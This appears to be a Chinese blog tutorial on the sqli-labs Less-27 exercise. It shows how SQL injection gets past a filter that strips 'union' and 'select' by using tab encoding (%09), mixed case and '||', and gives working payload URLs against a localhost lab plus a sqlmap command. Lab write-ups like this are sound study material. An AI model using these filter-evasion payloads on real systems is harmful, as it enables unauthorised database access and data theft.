【安全】P 2-18 绕过剔除黑名单(union和select)的SQL注入

本文介绍了SQL注入的基础知识,包括MySQL的大小写不敏感性、编码转换以及特殊字符替换。接着详细分析了`preg_replace`函数在去除`union`的代码实现,并展示了如何通过利用%09、%0a、%0d等编码以及符号双写来绕过过滤。最后提到了sqlmap工具进行安全检测的方法,提供了一系列的payload示例。
摘要由CSDN通过智能技术生成

0X01 基础知识介绍

1、Mysql中的大小写不敏感,大写与小写一样。
2、Mysql 中的十六进制与URL编码通过解码识别。
3、符号和关键字替换 and – &&、or – ||。
4、空格使用 %20表示、%0a换行 %09 tab

0X02 去除(union)的代码分析

preg_replace(mixed $pattern , mixed $replacement , mixed $subject):执行一个正则表达式的搜索和替换。
$pattern: 要搜索的模式,可以是字符串或一个字符串数组
$replacement: 用于替换的字符串或字符串数组。
$subject: 要搜索替换的目标字符串或字符串数组。
在这里插入图片描述

去除全家桶

0X03 绕过去除(union)的sql的注入

less 27 GET - Error Based- All your UNION & SELECT belong to us (过滤了union和select的)
%09表示空格、 ||表示 or 、union/select 大小写、双写绕过。
http://127.0.0.1/sqli-labs/Less-27/?id=0%27%09%09uniOn%09SelEcT%091,2,3%09||%09%271
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-27/?id=0%27%09%09uniOn%09SelEcT%091,database(),3%09||%09%271
在这里插入图片描述

同样的配方构建payload

0X04 sqlmap安全检测

sqlmap -u “URL” --dbs --batch
在这里插入图片描述
-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值